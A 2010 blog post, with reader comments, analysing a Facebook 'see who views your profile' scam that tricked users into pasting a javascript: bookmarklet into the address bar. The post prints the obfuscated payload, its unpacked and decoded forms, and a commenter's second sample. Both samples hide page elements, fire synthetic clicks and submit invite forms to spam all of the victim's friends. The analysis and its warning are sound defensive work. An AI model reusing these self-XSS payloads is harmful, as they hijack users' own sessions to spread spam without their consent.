
On Facebook, the Spam Never Ends

by Jiang on May.09, 2010, under Computing, Hacks

This morning I woke up to an inbox full of suggestions to “like” a certain page on Facebook. Curious, I decided to have a look. It turned out to be a service promising to show you who views your profile (which, of course, is absolutely absurd), and all you had to do was press ctrl+c, alt+d, ctrl+v, and enter. Apparently, a lot of people did this and found themselves wondering how their browsers got hijacked.

I realized that the instructions had me copy some hidden text to the clipboard, focus the address bar, paste the text, and navigate to it. The “text” happened to be a bit of JavaScript behind a javascript: prefix (commonly known as a bookmarklet or favelet), and “navigating” to such a URL executes the code inside whatever page is currently open — here, Facebook.

// The bookmarklet exactly as distributed. The outer function assigns five
// element ids (a, b, ifc, ifo, mw) as implicit globals and then eval()s a
// Packer-style payload; the unpacked code is shown further down. Because of
// the javascript: scheme nothing runs until a user pastes it into the address
// bar of an already-open page, at which point it executes with that page's
// DOM and the user's own session — the victim is tricked into acting against
// their own account.
javascript:(function(){a='app120038468024406_jop';b='app120038468024406_jode';ifc='app120038468024406_ifc';ifo='app120038468024406_ifo';mw='app120038468024406_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

At first glance, there seems to be a dense core of obfuscated code generated by Dean Edwards’s JavaScript Packer. Since it’s a bookmarklet, I thought Packer was used here for compression. I was curious, so I unpacked the code to reveal:

// Unpacked payload. a, b, ifc, ifo and mw are the element ids assigned by the
// bookmarklet's outer wrapper; d, s, m and c are implicit globals.
// _0x95ea stores every DOM property name, element id and URL as hex escapes,
// so a casual reader sees nothing recognizable. The decoded array follows.
var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
d=document;
// [2]=getElementById, [1]=style, [0]=visibility, [3]=hidden: hide the wrapper
// element, presumably so the user never sees the dialogs driven below.
d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];
// [4]=innerHTML, [5]=value: copy field b's value into element a.
// The purpose of this copy is not evident from the sample.
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];
// [6]="suggest", [7]="likeme": the two controls that will be clicked.
s=d[_0x95ea[2]](_0x95ea[6]);
m=d[_0x95ea[2]](_0x95ea[7]);
// [9]=createEvent("MouseEvents"), [11]=initEvent("click", bubbles, cancelable),
// [12]=dispatchEvent: a synthetic click on "suggest".
c=d[_0x95ea[9]](_0x95ea[8]);
c[_0x95ea[11]](_0x95ea[10],true,true);
s[_0x95ea[12]](c);
// The three timers share the same 5000 ms delay and so fire in registration
// order. fs and SocialGraphManager are not defined in the sample; presumably
// objects the host (Facebook) page itself exposes — TODO confirm.
// [13]=select_all
setTimeout(function(){fs[_0x95ea[13]]()},5000);
// [16]=submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php")
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);
// click "likeme", then copy field ifc's value into element ifo's innerHTML.
setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

Clearly, compression wasn’t the goal; the strings are merely hex-escaped to hide what the code touches. I evaluated the array of obfuscated strings in Firebug and got some familiar content:

// The same array with the hex escapes decoded: DOM property/method names, the
// two element ids ("suggest", "likeme"), the invite form id and the Facebook
// endpoint it is posted to. Position matters — the code indexes into this
// array by number (e.g. [2] = getElementById, [12] = dispatchEvent,
// [15] = the invite_dialog.php path).
var _0x95ea=["visibility","style","getElementById","hidden","innerHTML","value","suggest","likeme","MouseEvents","createEvent","click","initEvent","dispatchEvent","select_all","sgm_invite_form","/ajax/social_graph/invite_dialog.php","submitDialog"];

At this point, I got the feeling that this bookmarklet hides page elements that should stay visible, fires synthetic click events, and ultimately submits a form. Substituting the array’s contents into the rest of the code, I got:

// The unpacked code with the decoded strings substituted in. a, b, ifc, ifo
// and mw are the element ids set by the bookmarklet's outer wrapper; s, m and
// c are implicit globals.
// Hide the wrapper element (presumably so the user does not see the dialogs).
document.getElementById(mw).style.visibility="hidden";
// Copy field b's value into element a; purpose not evident from the sample.
document.getElementById(a).innerHTML=document.getElementById(b).value;
s=document.getElementById("suggest");
m=document.getElementById("likeme");
// Synthetic bubbling, cancelable click fired at "suggest".
c=document.createEvent("MouseEvents");
c.initEvent("click",true,true);
s.dispatchEvent(c);
// Equal 5000 ms delays, so the timers run in registration order. fs and
// SocialGraphManager are not defined here; presumably page-level objects of
// the host (Facebook) page — TODO confirm.
setTimeout(function(){fs.select_all()},5000);
setTimeout(function(){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php")},5000);
// Click "likeme" with the same event, then copy field ifc's value into ifo.
setTimeout(function(){m.dispatchEvent(c);document.getElementById(ifo).innerHTML=document.getElementById(ifc).value},5000);

Ultimately, we end up with the following snippet, which makes you “like” the page and suggest it to all your friends:

// The de-obfuscated bookmarklet. Everything below runs inside the victim's own
// browser on the Facebook page, so it needs no stolen credentials: the user's
// live session does the work. Every name is an implicit global (no var).
//
// Element ids on the page being promoted. The numeric prefix looks like a
// Facebook app/page id; the suffixes (jop, jode, ifc, ifo, mwrapper) are not
// explained anywhere in the sample.
a='app120038468024406_jop';
b='app120038468024406_jode';
ifc='app120038468024406_ifc';
ifo='app120038468024406_ifo';
mw='app120038468024406_mwrapper';
// Step 1: hide the wrapper element, presumably so the user never sees the
// dialogs that the remaining steps drive.
document.getElementById(mw).style.visibility="hidden";
// Step 2: copy a form field's value into another element's innerHTML.
// Purpose is not evident from the snippet.
document.getElementById(a).innerHTML=document.getElementById(b).value;
// Step 3: build a synthetic, bubbling, cancelable click and fire it at the
// "suggest" control.
eventClick=document.createEvent("MouseEvents");
eventClick.initEvent("click",true,true);
document.getElementById("suggest").dispatchEvent(eventClick);
// Steps 4-6 are all scheduled at 5000 ms — presumably to give whatever the
// click opened time to load — and, having equal delays, run in the order they
// were registered. fs and SocialGraphManager are not defined in the sample;
// presumably objects the Facebook page itself exposes — TODO confirm.
// Step 4: by its name, select every friend in the suggest dialog.
setTimeout(function(){fs.select_all()},5000);
// Step 5: submit the invite form — this is the fan-out to all friends.
setTimeout(function(){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php")},5000);
// Step 6: reuse the same event to click "likeme" (the victim now "likes" the
// page), then copy one more field's value into an element's innerHTML.
setTimeout(function(){document.getElementById("likeme").dispatchEvent(eventClick);document.getElementById(ifo).innerHTML=document.getElementById(ifc).value},5000);

While these scams are common on Facebook, I’d like to take this opportunity to warn everyone to always be vigilant while navigating the Internet — and in particular never to paste text you do not understand into the browser’s address bar, since that is all it took here. The script of the day did not do much real damage, but at least a hundred thousand Facebook users were spammed; tens of thousands were scammed into propagating this viral page.

But what about seeing who’s viewing your profile?

Think about it this way: would you like others to know about your browsing habits? As I said earlier, this would be an absurd breach of privacy, and fortunately Facebook does not support this “functionality” by default. Third-party apps have different policies, however, and these apps have access to privileged information about their users. In particular, a Facebook app is able to track when it is viewed by its users. So when a Facebook user who has this tracking app enabled views another Facebook user who also has the app on his/her profile, the app sees and records the viewing relationship.

Pages don’t have this functionality, however; only apps do. As far as the viral page goes, it is a fake.


2 comments for this entry:
  1. Gostak

    Thanks, this explains the (bad word) that I found. Now I have to go and send every one a message to disregard it. What a pile of smelly stuff.

  2. Craig B

    Good post, thanks. I got caught by similar javascript. Your post confirmed my fear. I’ve reported both the FB and Blogspot pages.

    Here is the original:
    // Second sample, as pasted by the commenter. The blog has word-wrapped the
    // string literals across blank lines, so this is not runnable as shown.
    // Decoded, the array holds: [0] innerHTML, [1] app6165549526_body,
    // [2] getElementById, [3] an <a id="suggest" ...> element whose ajaxify
    // attribute points at invite_dialog.php?class=FanManager&amp;node_id=111379432240381
    // with the text "Suggest to Friends", [4] suggest, [5] MouseEvents,
    // [6] createEvent, [7] click, [8] initEvent, [9] dispatchEvent,
    // [10] select_all, [11] sgm_invite_form,
    // [12] /ajax/social_graph/invite_dialog.php, [13] submitDialog, and
    // [14] an <iframe> whose src is the profilespy.blogspot.com page.
    // Flow: inject the anchor into the app body, click it, after 4 s call
    // fs.select_all(), after 5 s submit the invite dialog, and — immediately,
    // not on a timer — replace the app body with the iframe.
    javascript:var _0x5e5a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x36\x31\x36\x35\x35\x34\x39\x35\x32\x36\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D

    \x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F

    \x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C

    \x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D

    \x31\x31\x31\x33\x37\x39\x34\x33\x32\x32\x34\x30\x33\x38\x31\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F

    \x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F

    \x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E

    \x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F

    \x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x70\x72\x6F\x66\x69\x6C

    \x65\x73\x70\x79\x2E\x62\x6C\x6F\x67\x73\x70\x6F\x74\x2E\x63\x6F\x6D\x2F\x22\x20\x73\x74\x79\x6C\x65\x3D

    \x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A

    \x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C

    \x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x5e5a[0],_0x5e5a[1],_0x5e5a[2],_0x5e5a[3],_0x5e5a[4],_0x5e5a[5],_0x5e5a[6],_0x5e5a[7],_0x5e5a[8],_0x5e5a[9],_0x5e5a[10],_0x5e5a[11],_0x5e5a[12],_0x5e5a[13]];void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true);void ss[variables[9]](c);void setTimeout(function (){fs[variables[10]]();} ,4000);void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000);void (document[variables[2]](variables[1])[variables[0]]=_0x5e5a[14]);

    Which seems to boil down to this:
    // Reader's reconstruction of the sample above. It is pseudo-code (strings
    // shown unquoted) and two decoded values were lost: _0x5e5a[3] is not the
    // bare text "Suggest to Friends" but a whole <a id="suggest" ...> element
    // whose ajaxify attribute targets
    // /ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=111379432240381
    // — the script injects its own "Suggest to Friends" link, then clicks it.
    void (document[getElementById](app6165549526_body)[innerHTML]=Suggest to Friends);
    var ss=document[getElementById](suggest);
    var c=document[createEvent](MouseEvents);

    // Synthetic bubbling, cancelable click fired at the injected link.
    c[initEvent](click,true,true);

    void ss[dispatchEvent](c);

    // fs and SocialGraphManager are not defined in the sample; presumably
    // objects exposed by the host page — TODO confirm. Note the staggered
    // delays (4 s, then 5 s) rather than the equal delays of the first sample.
    void setTimeout(function (){fs[select_all]();} ,4000);

    void setTimeout(function (){SocialGraphManager[submitDialog]

    (sgm_invite_form,/ajax/social_graph/invite_dialog.php);} ,5000);

    // The original assigns _0x5e5a[14] here: an <iframe> whose src is the
    // profilespy.blogspot.com page. This runs immediately, not in a timer, so
    // the injected link is swapped for the iframe right after being clicked.
    void (document[getElementById](app6165549526_body)[innerHTML]=);
